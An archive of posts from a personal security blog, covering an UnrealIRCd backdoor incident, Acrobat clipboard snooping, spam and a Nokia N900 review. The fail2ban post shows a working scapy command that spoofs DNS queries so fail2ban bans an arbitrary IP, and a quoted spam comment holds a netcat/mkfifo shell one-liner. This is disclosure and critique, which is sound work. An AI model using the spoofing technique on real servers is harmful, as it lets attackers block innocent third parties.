Entries by Nico Golde

I participated together with some friends in this years edition of the smpCTF quals (actually it took place for the first time). Since we also qualified for the finals we had to submit a writeup of all challenges. For those who are interested, our submission is located on: http://nion.modprobe.de/smpctf/smpctf.html.

All in all I had fun during this weekend but I also have to say that I've had more at other CTFs in the past. What disappointed me especially is that I'm aware of at least 2 challenges that seem to be only slight alterations of challenges from the DEFCON and Codegate quals. I also missed creativity when it comes to the binary exploitation challenges, most of them have not been challenging. But as said, I enjoyed this weekend, had lots of fun and a big plus was the radio stream during the competition with support from dubstep.fm

Anyway, congrats to team nibbles who've won the CTF

I was just looking into some specifications of the openmobilealliance when I got the content for todays WTF moment.
An MMS notification is usually sent over SMS and encodes various fields including the location of where the MMS content is located so the mobile phone can download it via e.g. WAP.

Now looking at WAP-209-MMSEncapsulation-20020105-a chapter 6.2. (Multimedia Message Notification) there's an interesting header field included in these notifications, X-Mms -Message-Size

Mandatory.
Full size of message in octets. The value of this header
field could be based on approximate calculation,
therefore it SHOULD NOT be used as a reason to reject
the MM.

Clearly the people who developed this must have taken some bad drugs. Adding a length field value to a header and allow it to be based on an approximation rather than an exact value just doesn't explain itself to me.

I know there is some setting in adobe acrobat reader to switch of monitoring of the X paste buffer (which I couldn't find now) and it seems one really wants that. I was very surprised today when I tried to paste a password using pwsafe and observed the following:
$ pwsafe -p fandango
Enter passphrase for /home/nion/.pwsafe.dat:
You are ready to paste the password for hosts.fandango from PRIMARY and CLIPBOARD
Press any key when done
Sending password for hosts.fandango to acroread@hostname via CLIPBOARD

So apparently acrobat reader is stealing my password from the X paste buffer if the application is running. Especially given all the javascript, malicious pdf file kungfu that is around these days I of course don't find this very amusing.

Lesson learned: Use xpdf whenever I can even though it really lacks features :/

The UnrealIRCd team has just published an advisory advisory stating their release has been backdoored. From the advisory:

We found out that the Unreal3.2.8.1.tar.gz file on our mirrors has been
replaced quite a while ago with a version with a backdoor (trojan) in it.
This backdoor allows a person to execute ANY command with the privileges of
the user running the ircd. The backdoor can be executed regardless of any user
restrictions (so even if you have passworded server or hub that doesn't allow
any users in).

It appears the replacement of the .tar.gz occurred in November 2009 (at least on some mirrors). It seems nobody noticed it until now.

I'm personally not using this software but this is probably a shock for lots of sysadmins as this is one of the most popular IRC server applications. The last sentence of this quote is the most shocking to me. This slipped through the cracks for about 8 months without being noticed! This shows yet another time that upstream developers need to think about providing ways to allow users to properly verify the integrity of their releases and (which is probably more important) users need to verify what they download. There is no point in md5 and friends being broken if nobody cares for hashes anyway.

The UnrealIRCd people seemed to have learned their lesson and will start PGP/GPG signing their releases from now on. Hopefully their users verify their tarballs then.
So what was the backdoor exactly about? It didn't take me much time to find a backdoored tarball, "gladly" there are still lots of websites mirroring backdoored tarballs.

The backdoor is pretty small, simple and efficient, a full diff can be found here.
Only two files have been modified, the first one is the important one: s_bsc.c, function read_packet():

This is the important function to handle client connection data and processes all client data. the modification are the 4 lines at the end.
The code is simple. The first two bytes of readbuf are compared with DEBUGMODE3_INFO. readbuf is used a few lines before to read data from the client connection. So basically this introduces a new irc "command" DEBUGMODE3_INFO.
DEBUGMODE3_INFO is defined as AB in include/struct.h. If the received bytes match AB DEBUG3_LOG is called with the read buffer as argument. DEBUG3_LOG is just another macro that resolves to DEBUG3_DOLOG_SYSTEM (defined in the same file) which looks like:
So this allows an attacker to connect to the irc server and execute arbitrary commands by using the AB comment. This is probably the most simple backdoor one can think of but it's rather efficient and unlikely to be hit by accident from a client. Bad days for UnrealIRCd and there are still many servers out there which are probably backdoored this way, at least it didn't cost me much time to find some :/

I occasionally make use of the report function in opera in case it crashes (which happens quite often on 64bit for me), but if it crashes right when receiving the response
of the crash reporting website you really start to HATE that piece of software.


(notice Last visited URL)

FAIL! (using 0.60-6351)

fail2ban is used by many people to prevent certain types of DoS attacks. I use it myself to reduce trackback spam a little bit.

While this tool becomes quite handy in such situations it is also not generally recommend because you can shoot yourself in the foot. If one of the used filters has a bug and results in incorrect parsing your fail2ban installation might end up banning arbitrary IP addresses or even your own IP range (not even mentioning IP spoofing).
There existed at least two bugs of this kind to my knowledge and since regex might not always be easy I'm sure there will be more in the future.

Since I didn't want to look for a specific regex bug in one of the filters I thought about IP spoofing again and looked at fail2bans filters. What I needed was a filter processing log entries of a service listening on a UDP socket as TCP/IP spoofing over the internet doesn't really work well these days. Finding such a filter would mean an instant win situation. To my surprise there is such a filter: config/filter.d/named.conf

This filter is used to parse log entries consisting of denied DNS queries produced by bind. Interestingly there is even an article at debian-administration describing how to setup fail2ban to mitigate a DNS DDoS attack. This is of course a bad idea and I have no idea why this filter is shipped in a default fail2ban installation. DoSing abritary IP addresses with this filter in use becomes as easy as firing up scapy and querying the server with a forged source IP:

>>> send(IP(dst="81.169.172.197",src="xx.46.63.71")/UDP()/DNS(rd=1,qd=DNSQR(qname="foao.modprobe.de")))
.
Sent 1 packets.

This ends up as:
May 26 22:32:22 modprobe named[30245]: client xx.46.63.71#53: query 'foao.modprobe.de/A/IN' denied

in the bind logs which in turn results in:
2010-05-26 22:32:05,551 fail2ban.actions: WARNING [named-refused] Ban xx.46.63.71

In this example the spoofed IP was xx.46.63.71 which is not under my control.

Mission statement: don't use fail2ban unless you really want to shoot yourself in the foot or know pretty well what you're doing

It is possible with s9y to moderate blog comments after a certain amount of time has passed since the article was published.
A while back I got the following mail to approve a blog comment (I stripped the url and email address to not support the spam):

Mon, 19 Oct 2009 12:18:02 +0200 (CEST)
A new comment has been posted on your blog "nion's blog", to the entry entitled "security of scponly/sftp-server in combination with apache".
Link to entry: http://nion.modprobe.de/blog/archives/679-security-of-scponlysftp-server-in-combination-with-apache.html

Requires review: Yes (Auto-moderation after X days)
User IP-address: 24.123.215.XXX
User Name: SomeSpammer
User Email: webmaster@somespammer.com
User Homepage: http://www.somespammer.com

Comments:
Very interesting, seems so simple when you explain it like that.. nice one

This is quite obviously a spam comment to increase google ranks or site links in general.

Today I got a new comment:

Fri, 19 Mar 2010 02:35:54 +0200 (CEST)
A new comment has been posted on your blog "nion's blog", to the entry entitled "security of scponly/sftp-server in combination with apache".
Link to entry: http://nion.modprobe.de/blog/archives/679-security-of-scponlysftp-server-in-combination-with-apache.html

Requires review: Yes (Auto-moderation after X days)
User IP-address: 96.30.18.XXX
User Name: SomeSpammer
User Email: webmaster@somespammer.com
User Homepage: http://www.somespammer.com/

Comments:
Weird.. I found myself back here! small world. Reminds of this one from the commmandline kung fu of wietse.

( ( mkfifo ~/nc-feef && ( ( nc -v -l -p 22123 127.0.0.1 > ~/out ) & ) && ( ( cat /tmp/ncf | nc 127.0.0.1 22123 ) & ) && script -f ~/nc-feef ) & )

This comment is pointing to the same spammer site. Now comparing this comment to the first one at the first glance it seems even related to the blog post! Thinking of "wietse" the name Wietse Venema (author of postfix) pops up, so this also familiar.

Though opening a fifo in the home directory, a netcat listening tcp port on localhost with the output redirected to a file and then some tmp file piped to the listening port (thus writing the file) and attaching script to the FIFO doesn't really make sense?! Not that this is usually the case with spam, but wtf this is everything but obviously spam. If you have a blog that is commented highly frequent it might be a problem to sort that out and spot that even if it's not interesting to you. This is the difference to email, if it's spam, you don't notice but it's also not interesting you will just delete the mail. Using a blog you might approve such a comment as it might be interesting for another reader and you don't have time to read that in detail.

So this spam hit me 6 months after the first attempt again! It's interesting to see how spam evolves over time, this one clearly has been improved.

Now spam bots are producing code. This is scary. It will be interesting to see if and what comment I get from the guy on this article

... or you search for int main(int argn, char **argc) (I was looking for source code snippets that do not use the typical int argc, char **argv names) the google code search behaves rather strangely.

The first result you get is:


this is not too surprising as the google code search features regexes and * is a reserved symbol in POSIX extended regular expressions but at least the recommendation of int argn, char "main(int" "**argc)" is a bit surprising.

Searching for this actually results in a function that matches the string you wanted to search for originally. So far so good, I didn't look into the codesearch syntax in detail, so this might make sense.
The result looks like:

i
Note that the result has 9 pages (the screenshot is missing this detail) but also only 9 results. The first question that arises is: Why do they only display one result on the page instead of n (usually they do display more)?

Looking at the other pages it becomes confusing. On page 2 this looks like:


Now where have pages 4-9 been gone? Ok, to be fair, google sometimes strips additional search results if the content is too similar, this is not too surprising.

But then, visiting page 3 you get:


Tada, pages are there again!
At this point I am/was totally confused and am really wondering what the idea behind this behaviour is.
If someone is using the google codesearch more frequently (or even is a google employer) please enlighten me!

Two weeks ago I got myself a nokia n900 phone which is running maemo 5. So far I am quite happy with it, given that my previous phone was a sony erricsson p1i which is pretty crappy.
I've taken some notes about my experiences:

• under normal use the battery lasts for ~ 2 days, if I'm using 3G the whole day I need to recharge it daily though


• the terminal has a bug which results in the enter key not working under some conditions, ctrl-m works as a workaround though


• playing normal dvdrips in mplayer is absolutely no problem without downscaling, 720p doesn't perform though


• I somehow managed that my screen flipped and I wasn't able to flip it back, only a reboot solved that


• It is not clear to me which tools you will find in the list of installable packages and which are only visible with apt-cache search. I also managed to end up with a doubled launch icon in my application list for some application


• the termininal is not usable anymore after an ncurses program crashed, "reset" doesnt help either


• wireless uses less battery than umts, way less


• the back button in the browser is per default opening a fancy eyecandy browse history which is slow, so I mostly use backspace to browse back


• there is lots of useful tools in the extras-devel repository, e.g. I can control my mpd via mmpc from the phone which is great



• importing contacts works flawlessly, also merging existing contacts works as expected


• jabber (including xmpp calls) are integrated in the contacts information (you can merge a jabber uid into an existing contact)


• i've no idea yet what the internal video player is, but i wasn't able to play a non downscaled XviD file with it, mplayer does play it fine


• freely placeable widgets are awesome


• it's is really userfriendly and no geeky linux user phone


• i would prefer not having busybox per default, i can install bash but the libc is still from busybox which implies world readable password hashes in /etc/passwd, so no other user accounts on my mobile


• is there disk encryption available?


• n900fly can't cause any good


• gps with nokia maps is ok and I find it pretty usable even if a google maps client would be nice as well


• the mp3 mplayer sucks unless you have tagged your music properly, you can't just play some folder without having a playlist for it


• mplayer as an alternative from the console is no real alternative either, if you don't redirect its output to /dev/null it gets stuck in a loop when the display blanks,


• app manager locks dpkg lock even if you just list available programs, no idea why this is needed and no idea how aptitude and synaptic are doing this


• is there a good todo manager which comes with a widget listing todos?


• is it possible to install armel debian packages without having a debian chroot?


• sms are nicely organized per contact in an instant messaging fashion


• the builtin accelerator works nice and you can automatically flip the screen when you want to dial a number, sometimes happens by accident though


• the multiuser support works awesome and you get a nice overview of open applications in a composé fashion, it may be wise to have not 40 applications open though


• the list of processes is already huge (like 160 processes running in the background)


• i haven't checked out the sdk yet but I will do that soon as I need e.g. newsbeuter for RSS


• hardware feels robust, arm cortex a8 is imho a very good processor, RAM could be more (the phone is heavily swapping)


• you can not yet use the phone as a wireless access point without building your own kernel images, some people seem to be working on this


• you can manipulate all kinds of stuff through the sysfs, including the phone led and the vibration


• wireless certificates are sometimes shown to be invalid but there there is no details button, you can click only "done"

Those are the things I came up with while using the phone. The calling functionality and everything which is only phone related really works fine and the sound quality while talking to someone on the phone is also really good. So far I am really happy with the phone and I can only recommend it. I hope I'll have some time to port some applications to maemo soon.

I always hated garden gnomes and was under the impression that only old people collect them. But I have to realize that I just discovered the love to garden gnomes when I saw the Noam Chomsky garden gnome.


http://www.justsaygnome.net/gnomes-noams--oms---products---ordering.html

If you ever feel like sending me a gift, send me one of those
Too bad there's also a bunch of other important people I would like to as garden gnomes! If there is a business around that please leave a comment.